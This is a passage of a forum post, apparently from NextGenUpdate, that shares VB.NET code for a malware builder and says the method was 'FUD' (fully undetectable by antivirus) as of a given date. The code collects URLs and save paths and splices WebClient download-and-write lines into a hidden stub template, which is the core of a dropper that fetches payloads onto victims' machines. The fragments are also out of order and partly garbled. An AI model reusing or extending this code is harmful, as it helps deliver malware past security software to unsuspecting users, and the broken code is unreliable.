. This method was FUD as of May 1st.
Dim add As String = InputBox("Enter URL in the proper format: ", "Enter URL")
If add = Nothing Then
MessageBox.Show("No URL was added", "No URL")
ElseIf add.Contains("https://") And add <> Nothing Then
Dim loc As String = InputBox("Enter location you want the file to be downloaded:", "Location")
Dim str(2) As String
Dim itm As ListViewItem
str(0) = add
str(1) = loc
itm = New ListViewItem(str)
lstdl.Items.Add(itm)
Else
MessageBox.Show("Incorrect URL formatting, please make sure" + vbNewLine + "that the url is in the format:" + vbNewLine + "https://www.somesite.com", "Invalid")
End If
If lstdl.SelectedItems.Count > 0 Then
For i = 0 To lstdl.SelectedItems.Count - 1
lstdl.Items.Remove(lstdl.SelectedItems(i))
Next
Else
MessageBox.Show("Please Select a File to remove", "Remove")
End If
download
Dim download As String = Nothing
If chk3.Checked = True Then
If lstdl.Items.Count <> 0 Then
Dim adding As String = "Dim test As Net.WebClient = New Net.WebClient()" + vbNewLine + "Dim test2 as Byte()= Nothing"
For i = 0 To lstdl.Items.Count - 1
If i = 0 Then
adding = adding + vbNewLine + "test2 = test.DownloadData(" + Chr(34) + lstdl.Items(i).Text + Chr(34) + ")"
adding = adding + vbNewLine + "System.IO.File.WriteAllBytes(" + Chr(34) + lstdl.Items(i).SubItems(1).Text + Chr(34) + "," + "test2)"
Else
adding = adding + vbNewLine + "test2 = test.DownloadData(" + Chr(34) + lstdl.Items(i).Text + Chr(34) + ")"
adding = adding + vbNewLine + "System.IO.File.WriteAllBytes(" + Chr(34) + lstdl.Items(i).SubItems(1).Text + Chr(34) + "," + "test2)"
End If
Next
tdes = tdes.Replace("download", adding)
Else
tdes = tdes.Replace("download", "")
End If
Else
tdes = tdes.Replace("download", "")
End If
Dim tdes As String = My.Resources.[b]des[/b]
Copyright © 2026, NextGenUpdate.
All Rights Reserved.